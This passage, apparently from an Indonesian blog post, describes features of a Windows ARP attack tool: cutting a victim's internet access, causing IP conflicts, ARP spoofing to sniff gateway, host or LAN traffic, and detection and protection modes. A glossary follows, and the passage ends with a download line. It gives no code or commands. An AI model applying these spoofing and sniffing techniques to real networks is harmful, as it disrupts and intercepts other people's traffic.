(2) Ban Gateway adalah cara salah satu cara yang unik untuk mematikan aktifitas komputer korban dari akses ke internet. Dengan memberi perintah atau mengatakan kepada gateway bahwa komputer tersebut, memiliki mac address yg salah. Sehingga komputer target di blok akses ke internet oleh gateway
(3) IP Conflict yaitu hampir sama seperti Arp Flood dengan mengirimkan paket yang menyebabkan ipconflict pada komputer target, sehingga si victim(komputer target) tidak dapat mengakses ke jaringan.
(4) Sniff Gateway yaitu melakukan spoofing ke komputer target dan gateway.
(5) Sniff Hosts yaiut melakukan aktivitas spoofing dengan 2target atau lebih dan ini merupakan salah satu tindakan yang berbahaya.. so, take with ur own risk
(6) Sniff Lan – hampir sama seperti Sniff Gateway, perbedaannya adalah, kalo Sniff mengirimkan arp broadcasting paket untuk mengatakan kepada seluruh komputer dalam sebuah jaringan bahwa kita adalah gateway, sehingga dapat melakukan sniffing terhadap semua hosts yg berada dalam lingkup gateway tersebut.

3. Detect
Feature ini memiliki fungsi utama untuk mendetect seluruh serangan yang ditujukan pada gateway atau host.

4. Protect
Feature ini berfungsi untuk memproteksi dan mendetect attacker atau serangan yang ditujukan pada gateway dan meresolve atau memperbaiki efek dari serangan tersebut.

5. Proxy Arp
6. Save arp packets
7. other features.

Untuk keterangan 5-7, silahkan cari sendiri cari tau dengan jarimu coz 3feature tersebut hanya tambahan

*Glosary

ARP adalah Address Resolution Protocol (ARP) atau protokol jaringan, yang melakukan maping layer protocl address ke hardware. Sebagai contoh, ARP digunakan untuk meresolve atau memperbaiki ip address pada jaringan.

Sniffing adalah adalah kegiatan menyadap dan/atau menginspeksi paket data menggunakan sniffer software atau hardware di internet atau jaringan.

Spoofing adalah aksi pemalsuan identitas. IP Spoofing merupakan tehnik yang digunakan bagi penyelundup untuk mengakses sebuah network dengan mengirimkan paket/pesan dari sebuah komputer yang mengindikasikan bahwa paket/pesan tersebut berasal dari host yang terpercaya.

Download Win Arp Attacker